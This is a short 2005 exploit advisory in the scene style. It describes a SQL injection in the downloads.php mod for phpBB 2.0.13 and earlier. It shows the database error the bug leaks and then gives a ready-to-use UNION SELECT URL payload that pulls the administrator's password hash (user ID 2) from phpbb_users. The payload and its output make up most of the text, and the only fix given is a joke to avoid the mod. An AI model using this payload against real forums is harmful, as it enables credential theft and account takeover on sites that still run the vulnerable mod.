The downloads.php mod in phpBB versions 2.0.13 and below is susceptible to SQL injection attacks.
0ce92f393a6f3a903793e7e849840515c41a42cafe951520eb3532b6aa45c5dd
heres a update of the paper:
phpBB 2.0.13 <= downloads.php Mod SQL injection
[ www.batznet.com ]
##############################################
Discussion:
--------------------
This exploit makes it possible to insert SQL Code through downloads.php
Bug:
--------------------
http://www.phpbb.de/downloads.php?cat=batz
Spits out an error msg:
Could not query downloads
DEBUG MODE
SQL Error : 1054 Unknown column 'leet' in 'where clause'
SELECT * FROM phpbb2_downloads where cat=leet ORDER by sort
Line : 106
File : downloads.php
Exploit:
--------------------
/downloads.php?cat=-1%20UNION%20SELECT%200,user_password,0,0,0,0,0,0,0%20FRO
M%20phpbb_users%20WHERE%20user_id=2/*
This gives the MD5 hash from UID 2!
Patch:
-------------------
Dont use this Mod. :)
Greetz:
-------------------
Greetz fly out to R_Q, darkkilla, Madinfect, EaTh, kr3mliyn
// written by [R]
// 02.04.2005